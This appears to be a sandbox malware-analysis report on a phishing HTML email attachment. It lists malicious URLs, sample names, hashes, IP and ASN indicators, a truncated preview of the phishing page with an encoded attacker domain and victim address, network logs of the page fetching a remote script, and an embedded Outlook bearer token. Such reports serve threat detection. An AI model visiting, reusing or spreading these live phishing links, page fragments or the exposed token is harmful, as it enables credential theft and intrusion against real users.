	https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3D	Get hash	malicious	HTMLPhisher	Browse	3.161.119.88
	https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3D	Get hash	malicious	HTMLPhisher	Browse	18.245.31.5
	http://ahmetorak.com/neuromarket	Get hash	malicious	HTMLPhisher	Browse	18.245.31.33
	ELECTRONIC RECEIPT_Europait.html	Get hash	malicious	HTMLPhisher	Browse	13.227.219.11
s-part-0017.t-0009.t-msedge.net	94411f0873e6410d644c8a630ffbdf387639fab05fbcda468a343ff3b5db246f_dump.bin.exe	Get hash	malicious	Ursnif	Browse	13.107.246.45
	https://hbsonlinecouk.atlassian.net/wiki/external/OTBhODE5Njg4ODY2NGIxZjk5NTUyOWZhNjRlMDI4YjE	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	Arcadia Aerospace Industries (AAI) - ILSMart - RFQ4567987654.html	Get hash	malicious	Unknown	Browse	13.107.246.45
	RFQ Various models.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://f2677811-d05a-4238-803b-e963ee14674b.inwise.net/Page_5-27-2024_3	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	HSBC Customer Information.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3D	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://paypalgiftcardgenerator.pages.dev/	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://sandnidenokvxzijas.theone-4.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	swift.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
fiveradio-newbam.com	https://ipfs.io/ipfs/bafkreigaatqmy2dep6ftrscv6trkpbmzbh4xy3oaecv4mhhl3rwhrsdpxy	Get hash	malicious	HTMLPhisher	Browse	172.67.196.150
	http://fiveradio-newbam.com	Get hash	malicious	Unknown	Browse	104.21.84.200
	https://fiveradio-newbam.com	Get hash	malicious	Unknown	Browse	172.67.196.150
	messages undelivered.htm_	Get hash	malicious	HTMLPhisher	Browse	172.67.196.150
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:eb3f4f83-6827-434b-9ee1-0182d3babf87	Get hash	malicious	HTMLPhisher	Browse	104.21.84.200
	REF# 5495941179-documentation 2032Pfile.msg	Get hash	malicious	HTMLPhisher	Browse	104.21.84.200
	Undelivered Messages.htm	Get hash	malicious	HTMLPhisher	Browse	104.21.84.200
	https://telescope.ac/vasquez-law-firm-pllc/wvc6cjldgiynavw0rm64p1	Get hash	malicious	HTMLPhisher	Browse	172.67.196.150
	https://fiveradio-newbam.com	Get hash	malicious	Unknown	Browse	172.67.196.150
	undelivered Messages - Copie.htm	Get hash	malicious	HTMLPhisher	Browse	172.67.196.150
cs1100.wpc.omegacdn.net	https://hbsonlinecouk.atlassian.net/wiki/external/OTBhODE5Njg4ODY2NGIxZjk5NTUyOWZhNjRlMDI4YjE	Get hash	malicious	HTMLPhisher	Browse	152.199.23.37
	https://www.yumpu.com/en/document/read/68712704/view-and-print-online-confidential-doc-98372-6-3-2	Get hash	malicious	HTMLPhisher	Browse	152.199.23.37
	https://f2677811-d05a-4238-803b-e963ee14674b.inwise.net/Page_5-27-2024_3	Get hash	malicious	HTMLPhisher	Browse	152.199.23.37
	https://attachments.office.net/owa/cmangava%40tharisa.com/service.svc/s/GetAttachmentThumbnail?id=AAMkAGE2N2U5NmFkLWIzMjEtNGMwNS1iOWVlLWExNTBkNDk2NTZjMABGAAAAAAAsNFCwuPDISrln6MRbSR5lBwBC4JDOFd8jTJozG%2BNc7YRrAAAAmcUBAABu3YNoqzF8SLI68HoWeAXzAAFRD3sAAAABEgAQAOXLRvcdfU5Kkg7Zx598XsI%3D&thumbnailType=2&token=eyJhbGciOiJSUzI1NiIsImtpZCI6IkU1RDJGMEY4REE5M0I2NzA5QzQzQTlFOEE2MTQzQzAzRDYyRjlBODAiLCJ0eXAiOiJKV1QiLCJ4NXQiOiI1ZEx3LU5xVHRuQ2NRNm5vcGhROEE5WXZtb0EifQ.eyJvcmlnaW4iOiJodHRwczovL291dGxvb2sub2ZmaWNlLmNvbSIsInVjIjoiNTIyZjRhMmM0ZWRmNDA4NjkxMWIwMGFjYzE2ZjgzNzEiLCJzaWduaW5fc3RhdGUiOlsiZHZjX21uZ2QiLCJkdmNfY21wIiwiZHZjX2RtamQiLCJpbmtub3dubnR3ayJdLCJ2ZXIiOiJFeGNoYW5nZS5DYWxsYmFjay5WMSIsImFwcGN0eHNlbmRlciI6Ik93YURvd25sb2FkQDliMDgyOWI5LWJlMzktNDMzNi1hNzY2LWY4YzlkYzJjNzFhNCIsImlzc3JpbmciOiJXVyIsImFwcGN0eCI6IntcIm1zZXhjaHByb3RcIjpcIm93YVwiLFwicHVpZFwiOlwiMTE1MzkwNjY2MTMxNDQwNDI4NFwiLFwic2NvcGVcIjpcIk93YURvd25sb2FkXCIsXCJvaWRcIjpcIjUyMjAyODA5LWJkODUtNGZmOC04NTUwLTRjNzUwZjNhODNlZFwiLFwicHJpbWFyeXNpZFwiOlwiUy0xLTUtMjEtMTAxMjEyODM0Ni0xNjc3NDQzNDQtMTE3Njg1Mjg2MS0xMzc4MTQ4OVwifSIsIm5iZiI6MTcxNjc5NjM3MCwiZXhwIjoxNzE2Nzk2NjcwLCJpc3MiOiIwMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDBAOWIwODI5YjktYmUzOS00MzM2LWE3NjYtZjhjOWRjMmM3MWE0IiwiYXVkIjoiMDAwMDAwMDItMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwL2F0dGFjaG1lbnRzLm9mZmljZS5uZXRAOWIwODI5YjktYmUzOS00MzM2LWE3NjYtZjhjOWRjMmM3MWE0IiwiaGFwcCI6Im93YSJ9.QgmzIBWvZG6gLwDV2SGPl9TdStXctQrpU_xiIGcL5I4eoVDkUPzqcKcrSAnwOD_E73nNMbCTWC-kgcJIIFGhLmh8iFWITRD5MwmaJN23JV7c8rlmzHlxnoqm8tPo98Soui3XZZYSaJZVTruXDBhUCiweHA69qYSoZDJxVUYZDvl5KvXMWJkA_ui0Vq1Sw7pPL5h9t4_QlGAarVBz6O9q21EGSBoX_hWPpcaEGJwoBDVeI-G6VvbkXzy9bJEMEZ6N-WzLyQtuKS9HVJBafIkUxsf0pIhhnJUluyukhnQ1dZohnpQr8e5v0Xoa3SObMFt_C5SeZHG2hFyxqFdeBhKQ_w&X-OWA-CANARY=X-OWA-CANARY_cookie_is_null_or_empty&owa=outlook.office.com&scriptVer=20240517003.15&clientId=1A63CAED249649AEBB5264A13128C2B5&animation=true&persistenceId=80cb7b14-7011-42b1-acde-250d928510f9	Get hash	malicious	HTMLPhisher	Browse	152.199.23.37
	https://sandnidenokvxzijas.theone-4.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	152.199.23.37
	http://live-support-apple.info/cbyov	Get hash	malicious	Unknown	Browse	152.199.23.37
	http://azuremail.ca/passerelle.php?id_envoi_courriel=5806909&lien=//xenbel.net/checker2	Get hash	malicious	HTMLPhisher	Browse	152.199.23.37
	https://link.elliottscotthr.com/api/redirect.me?track=000000&url=https%3A%2F%2Fwww.atjehupdate.com/3tvdgh	Get hash	malicious	HTMLPhisher	Browse	152.199.23.37
	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse	152.199.23.37
	undelivered messages.htm	Get hash	malicious	HTMLPhisher	Browse	152.199.23.37

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	Wave Browser.exe	Get hash	malicious	Unknown	Browse	204.79.197.203
	bot.mpsl-20240528-2108.elf	Get hash	malicious	Mirai, Moobot	Browse	20.80.70.24
	bot.mips-20240528-2110.elf	Get hash	malicious	Mirai, Moobot	Browse	157.55.39.253
	94411f0873e6410d644c8a630ffbdf387639fab05fbcda468a343ff3b5db246f_dump.bin.exe	Get hash	malicious	Ursnif	Browse	20.50.2.44
	ps-updater.exe	Get hash	malicious	Unknown	Browse	20.163.176.155
	update.hta	Get hash	malicious	Unknown	Browse	20.163.176.155
	update.ps1	Get hash	malicious	Unknown	Browse	20.163.176.155
	update2.hta	Get hash	malicious	Unknown	Browse	20.163.176.155
	https://hbsonlinecouk.atlassian.net/wiki/external/OTBhODE5Njg4ODY2NGIxZjk5NTUyOWZhNjRlMDI4YjE	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	http://www.e-owa.com/?urid=w-bvaQpg_ubm0eUdQAIGwogWs5gyki66CaUsAZZwVgAng3t3C1QOOJpyuU0PymTGXJzATyjUEHXoVUSkj0qKTYbtXKiXgMsAzQrEN0wKlaNz0s6Ew02mxcuYxjZGsEHDf00Na9xbfdgud34tymlX&rg=WEU	Get hash	malicious	Unknown	Browse	104.46.61.116
MICROSOFT-CORP-MSN-AS-BLOCKUS	Wave Browser.exe	Get hash	malicious	Unknown	Browse	204.79.197.203
	bot.mpsl-20240528-2108.elf	Get hash	malicious	Mirai, Moobot	Browse	20.80.70.24
	bot.mips-20240528-2110.elf	Get hash	malicious	Mirai, Moobot	Browse	157.55.39.253
	94411f0873e6410d644c8a630ffbdf387639fab05fbcda468a343ff3b5db246f_dump.bin.exe	Get hash	malicious	Ursnif	Browse	20.50.2.44
	ps-updater.exe	Get hash	malicious	Unknown	Browse	20.163.176.155
	update.hta	Get hash	malicious	Unknown	Browse	20.163.176.155
	update.ps1	Get hash	malicious	Unknown	Browse	20.163.176.155
	update2.hta	Get hash	malicious	Unknown	Browse	20.163.176.155
	https://hbsonlinecouk.atlassian.net/wiki/external/OTBhODE5Njg4ODY2NGIxZjk5NTUyOWZhNjRlMDI4YjE	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	http://www.e-owa.com/?urid=w-bvaQpg_ubm0eUdQAIGwogWs5gyki66CaUsAZZwVgAng3t3C1QOOJpyuU0PymTGXJzATyjUEHXoVUSkj0qKTYbtXKiXgMsAzQrEN0wKlaNz0s6Ew02mxcuYxjZGsEHDf00Na9xbfdgud34tymlX&rg=WEU	Get hash	malicious	Unknown	Browse	104.46.61.116
CLOUDFLARENETUS	Enquiry - ENQ#16801.exe	Get hash	malicious	FormBook	Browse	172.67.137.210
	Swift.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://link.sbstck.com/redirect/07cc7c38-01c9-45b4-adfb-583529674442?j=eyJ1IjoiM3l4NDRuIn0.hIfuke8RAzj-gbQmS59B61RAw2SA19eZRoxzpvNlDOU	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	Wave Browser.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	QTE000021674.doc	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	SecuriteInfo.com.Win32.PWSX-gen.1159.5272.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	SecuriteInfo.com.Trojan.DownLoader26.36535.3145.856.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	smartsscreen.exe	Get hash	malicious	Xmrig	Browse	1.1.1.1
	SecuriteInfo.com.Trojan.DownLoader26.36535.3145.856.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Due Invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer, XWorm	Browse	104.26.13.205
EDGECASTUS	Wave Browser.exe	Get hash	malicious	Unknown	Browse	152.195.19.97
	smartsscreen.exe	Get hash	malicious	Xmrig	Browse	192.229.221.95
	http://t.co/YMBMR6DEIY	Get hash	malicious	HTMLPhisher	Browse	93.184.221.165
	https://venmo.com/story/3666451449833989812?k=None	Get hash	malicious	Unknown	Browse	192.229.221.25
	https://hbsonlinecouk.atlassian.net/wiki/external/OTBhODE5Njg4ODY2NGIxZjk5NTUyOWZhNjRlMDI4YjE	Get hash	malicious	HTMLPhisher	Browse	152.199.23.37
	http://www.e-owa.com/?urid=w-bvaQpg_ubm0eUdQAIGwogWs5gyki66CaUsAZZwVgAng3t3C1QOOJpyuU0PymTGXJzATyjUEHXoVUSkj0qKTYbtXKiXgMsAzQrEN0wKlaNz0s6Ew02mxcuYxjZGsEHDf00Na9xbfdgud34tymlX&rg=WEU	Get hash	malicious	Unknown	Browse	152.199.21.175
	https://nwwomansclub.wixsite.com/email-verification-a	Get hash	malicious	Unknown	Browse	93.184.221.165
	http://poste-servizi.dnset.com/	Get hash	malicious	Unknown	Browse	192.229.233.25
	https://homebuyingsecrets.com/	Get hash	malicious	Unknown	Browse	93.184.220.66
	http://sjhjbrgehkbhsbvdkshahhhhkjtj.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	93.184.221.165

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	http://t.co/YMBMR6DEIY	Get hash	malicious	HTMLPhisher	Browse	23.206.229.209
	https://bellavistainnovaong.com/A1/2f3f/.btf/?w=depau@depau.com	Get hash	malicious	Unknown	Browse	23.206.229.209
	http://exoticegy.com/	Get hash	malicious	Unknown	Browse	23.206.229.209
	https://mail.fnbo-in.selfip.com/x/otp.html	Get hash	malicious	Unknown	Browse	23.206.229.209
	https://fnbo-in.selfip.com/x/otp2.html	Get hash	malicious	Unknown	Browse	23.206.229.209
	https://fnbo-in.selfip.com/x/otp.html	Get hash	malicious	Unknown	Browse	23.206.229.209
	https://www.fnbo-in.selfip.com/x/personal.html	Get hash	malicious	Unknown	Browse	23.206.229.209
	https://www.fnbo-in.selfip.com/x/otp.html	Get hash	malicious	Unknown	Browse	23.206.229.209
	https://use-contactpro.pages.dev/	Get hash	malicious	Unknown	Browse	23.206.229.209
	http://dierdre45-capital-us.pages.dev/	Get hash	malicious	Unknown	Browse	23.206.229.209
28a2c9bd18a11de089ef85a160da29e4	https://link.sbstck.com/redirect/07cc7c38-01c9-45b4-adfb-583529674442?j=eyJ1IjoiM3l4NDRuIn0.hIfuke8RAzj-gbQmS59B61RAw2SA19eZRoxzpvNlDOU	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	23.43.61.160 184.28.90.27 40.68.123.157
	http://t.co/YMBMR6DEIY	Get hash	malicious	HTMLPhisher	Browse	23.43.61.160 184.28.90.27 40.68.123.157
	http://mansaduch.com	Get hash	malicious	Unknown	Browse	23.43.61.160 184.28.90.27 40.68.123.157
	http://purch.order.no/	Get hash	malicious	Unknown	Browse	23.43.61.160 184.28.90.27 40.68.123.157
	https://bellavistainnovaong.com/A1/2f3f/.btf/?w=depau@depau.com	Get hash	malicious	Unknown	Browse	23.43.61.160 184.28.90.27 40.68.123.157
	http://keendk.com	Get hash	malicious	Unknown	Browse	23.43.61.160 184.28.90.27 40.68.123.157
	https://salekit.io/6655e351d2f1cbb48f024e42	Get hash	malicious	Unknown	Browse	23.43.61.160 184.28.90.27 40.68.123.157
	http://exoticegy.com/	Get hash	malicious	Unknown	Browse	23.43.61.160 184.28.90.27 40.68.123.157
	http://michelleburch.autos/hearty/packs/?moon=Osfvv6KS	Get hash	malicious	TechSupportScam	Browse	23.43.61.160 184.28.90.27 40.68.123.157
	https://mail.fnbo-in.selfip.com/x/	Get hash	malicious	Unknown	Browse	23.43.61.160 184.28.90.27 40.68.123.157

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 29 12:06:22 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.98010589145734
Encrypted:	false
SSDEEP:	48:8XL9dKTYjHBidAKZdA1P4ehwiZUklqehs5y+3:8O0vOjy
MD5:	05CC954C06FB1DF8944EF412492E26F0
SHA1:	D9F488A24C7A53A8781A6EAAD8F128CCD531A332
SHA-256:	14BAFEA77C64B52E257FCCF411AE75BACDA7D3BE5A4C84569614BA315CDAC555
SHA-512:	735F0D257B69289E1A2DA970180CEA73EBB53171CC0AD6297981555780A5329C3FD63AD7E38268BDF73CBAAD394B8EA6E241E72A17A651DB68F26FC939116663
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......:......v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.h....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.h....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.h....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X.h.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X.h...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............8......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

File type:	HTML document, ASCII text, with very long lines (3843), with CRLF line terminators
Entropy (8bit):	4.403810891250637
TrID:	HyperText Markup Language (15015/1) 55.58% HyperText Markup Language (12001/1) 44.42%
File name:	ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html
File size:	5'510 bytes
MD5:	5d4a90e3d318b416d017f66001da91e0
SHA1:	dbba96e168e35d40967dae28d109d01ab1447cf6
SHA256:	e4ec93ec23ab28ca3bd839954aa1a8edd0e421e69db7aca16ca86e115693fb4c
SHA512:	0414e4723f3a3ddb7186dec902d0125c337e65131601f0d609acd09fda777494f72a04ac7f39c14b5208322bf8eb8e02fac222ff331b826d6773cecfa55d04c8
SSDEEP:	96:x6HcBCJR0fqmwVP/F/2WOAYsd6IlzcJCzcwtQzcCBc4sQufIYYFl8v:xQ0fqmwVP/EWOAYsd6IA2QxsYhk
TLSH:	39B12B7CB853D88EE9776DBFFCA02A55C0054E87FACCA798046C84563FE06983518BE5
File Content Preview:	<!DOCTYPE html>..<html point="aHR0cHM6Ly9maXZlcmFkaW8tbmV3YmFtLmNvbQ==" id="html" sti="VlZORlVqSXhNRFV5TURJMFZVNUpVVlZGTVRBek1UQTFNakV5TkRJd01qUXlNREkwTURVeU1UTXhNVEF5TkE9PQ==" vic="amministrazione@socage.it" lang="en">....<head>....</head>....<body id="a

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 29, 2024 15:06:20.935337067 CEST	53	63565	1.1.1.1	192.168.2.9
May 29, 2024 15:06:20.947650909 CEST	53	63061	1.1.1.1	192.168.2.9
May 29, 2024 15:06:21.113944054 CEST	64630	53	192.168.2.9	1.1.1.1
May 29, 2024 15:06:21.114152908 CEST	59535	53	192.168.2.9	1.1.1.1
May 29, 2024 15:06:21.115032911 CEST	64623	53	192.168.2.9	1.1.1.1
May 29, 2024 15:06:21.115156889 CEST	52605	53	192.168.2.9	1.1.1.1
May 29, 2024 15:06:21.121376991 CEST	53	59535	1.1.1.1	192.168.2.9
May 29, 2024 15:06:21.122133970 CEST	53	64630	1.1.1.1	192.168.2.9
May 29, 2024 15:06:21.153412104 CEST	53	52605	1.1.1.1	192.168.2.9
May 29, 2024 15:06:21.159126043 CEST	53	64623	1.1.1.1	192.168.2.9
May 29, 2024 15:06:22.966775894 CEST	53	55571	1.1.1.1	192.168.2.9
May 29, 2024 15:06:23.092199087 CEST	51765	53	192.168.2.9	1.1.1.1
May 29, 2024 15:06:23.092427969 CEST	64653	53	192.168.2.9	1.1.1.1
May 29, 2024 15:06:23.106255054 CEST	53	51765	1.1.1.1	192.168.2.9
May 29, 2024 15:06:23.128107071 CEST	53	64653	1.1.1.1	192.168.2.9
May 29, 2024 15:06:23.132009029 CEST	51536	53	192.168.2.9	1.1.1.1
May 29, 2024 15:06:23.132122993 CEST	56332	53	192.168.2.9	1.1.1.1
May 29, 2024 15:06:23.138778925 CEST	53	51536	1.1.1.1	192.168.2.9
May 29, 2024 15:06:23.139033079 CEST	53	56332	1.1.1.1	192.168.2.9
May 29, 2024 15:06:23.139842987 CEST	53	54593	1.1.1.1	192.168.2.9
May 29, 2024 15:06:24.380793095 CEST	53	65528	1.1.1.1	192.168.2.9
May 29, 2024 15:06:24.430677891 CEST	60864	53	192.168.2.9	1.1.1.1
May 29, 2024 15:06:24.430928946 CEST	54478	53	192.168.2.9	1.1.1.1
May 29, 2024 15:06:24.437522888 CEST	53	60864	1.1.1.1	192.168.2.9
May 29, 2024 15:06:24.438924074 CEST	53	54478	1.1.1.1	192.168.2.9
May 29, 2024 15:06:25.511038065 CEST	55004	53	192.168.2.9	1.1.1.1
May 29, 2024 15:06:25.511194944 CEST	50674	53	192.168.2.9	1.1.1.1
May 29, 2024 15:06:25.518562078 CEST	53	55004	1.1.1.1	192.168.2.9
May 29, 2024 15:06:25.518631935 CEST	53	50674	1.1.1.1	192.168.2.9
May 29, 2024 15:06:26.812594891 CEST	53	58074	1.1.1.1	192.168.2.9
May 29, 2024 15:06:26.812952042 CEST	53	56990	1.1.1.1	192.168.2.9
May 29, 2024 15:06:40.022993088 CEST	53	64582	1.1.1.1	192.168.2.9
May 29, 2024 15:06:59.174408913 CEST	53	55297	1.1.1.1	192.168.2.9
May 29, 2024 15:07:14.434092045 CEST	138	138	192.168.2.9	192.168.2.255
May 29, 2024 15:07:20.985981941 CEST	53	62018	1.1.1.1	192.168.2.9
May 29, 2024 15:07:22.275021076 CEST	53	50709	1.1.1.1	192.168.2.9
May 29, 2024 15:07:48.995903015 CEST	53	59359	1.1.1.1	192.168.2.9
May 29, 2024 15:08:35.213515043 CEST	53	50195	1.1.1.1	192.168.2.9

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 29, 2024 15:06:23.128223896 CEST	192.168.2.9	1.1.1.1	c248	(Port unreachable)	Destination Unreachable
May 29, 2024 15:07:50.664382935 CEST	192.168.2.9	1.1.1.1	c238	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
2024-05-29 13:06:12 UTC	59	OUT	GET / HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-05-29 13:06:12 UTC	513	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Wed, 29 May 2024 13:06:12 GMT content-type: application/json; charset=utf-8 Content-Length: 321 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-29 13:06:12 UTC	321	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a Data Ascii: { "ip": "8.46.123.175", "hostname": "static-cpe-8-46-123-175.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":

Timestamp	Bytes transferred	Direction	Data
2024-05-29 13:06:22 UTC	492	OUT	GET /jsnom.js HTTP/1.1 Host: fiveradio-newbam.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
